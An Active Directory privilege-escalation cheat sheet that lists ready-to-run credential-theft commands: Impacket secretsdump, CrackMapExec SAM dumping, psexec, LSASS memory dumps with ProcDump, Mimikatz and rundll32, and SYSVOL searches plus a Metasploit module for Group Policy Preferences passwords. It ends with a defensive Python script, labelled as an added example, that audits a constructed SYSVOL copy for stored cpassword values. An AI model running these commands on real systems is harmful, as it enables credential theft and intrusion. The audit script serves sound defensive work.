Privilege Escalation

  1. SecretsDump
     Description: Dump hashed credentials from SAM or LSASS on a domain controller or host.
     Tools/Commands:

    • Impacket: secretsdump.py <DOMAIN>/<USER>@<IP>

    • CrackMapExec: crackmapexec smb <IP> -u <USER> -p <PASS> --sam

    • psexec.py <DOMAIN>/<USER>@<IP>

  2. LSASS Dumping
     Description: Extract credentials from LSASS process memory.
     Tools/Commands:

    • ProcDump: procdump.exe -ma lsass.exe lsass.dmp

    • Mimikatz: sekurlsa::minidump lsass.dmp

    • rundll32.exe C:\path\to\procdump.dll,MiniDump <lsass_pid>

  3. GPP Passwords
     Description: Extract plaintext passwords stored in Group Policy Preferences files.
     Tools/Commands:

    • PowerShell: Get-ChildItem \\<DC>\SYSVOL -Recurse | Select-String -Pattern "password"

    • Metasploit: post/windows/gather/credentials/gpp

    • Manual search: Look for files with .xml extensions containing <cpassword> tags.
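As an added example (not part of the original cheat sheet), the following Python audit script implements the manual search from item 3 for a defender: it walks a copy of SYSVOL and reports every Group Policy Preferences file still carrying a non-empty cpassword attribute so the policy can be cleaned up. The directory layout and Groups.xml content are constructed here, and the cpassword value and GUID are placeholders.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# Constructed sample: a GPP Groups.xml with a stored cpassword attribute,
# shaped like SYSVOL\<domain>\Policies\<GUID>\Machine\Preferences\Groups\Groups.xml.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="LocalAdmin" changed="2015-01-01 00:00:00" uid="{PLACEHOLDER-UID}">
    <Properties action="U" cpassword="PLACEHOLDER_BASE64_BLOB"
                changeLogon="0" noChange="1" neverExpires="1"
                acctDisabled="0" userName="LocalAdmin"/>
  </User>
</Groups>
"""

# Preference file types that can carry a cpassword attribute.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Printers.xml", "Drives.xml"}


def find_cpassword(root_dir):
    """Return one finding per element with a non-empty cpassword under root_dir."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if name not in GPP_FILES:
                continue
            path = os.path.join(dirpath, name)
            try:
                tree = ET.parse(path)  # admin-authored XML from the domain's own SYSVOL
            except ET.ParseError:
                continue  # unreadable file: not a cpassword finding
            for elem in tree.iter():
                if elem.get("cpassword"):  # empty string means no password stored
                    findings.append({"file": path, "element": elem.tag,
                                     "user": elem.get("userName") or elem.get("runAs")})
    return findings


def build_sample_sysvol():
    """Create a temporary SYSVOL-like tree holding the constructed Groups.xml."""
    base = tempfile.mkdtemp()
    gpp_dir = os.path.join(base, "Policies", "{PLACEHOLDER-GUID}",
                           "Machine", "Preferences", "Groups")
    os.makedirs(gpp_dir)
    with open(os.path.join(gpp_dir, "Groups.xml"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_GROUPS_XML)
    return base


if __name__ == "__main__":
    for hit in find_cpassword(build_sample_sysvol()):
        print(f"{hit['file']}: <{hit['element']}> for {hit['user']} stores a cpassword")
```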
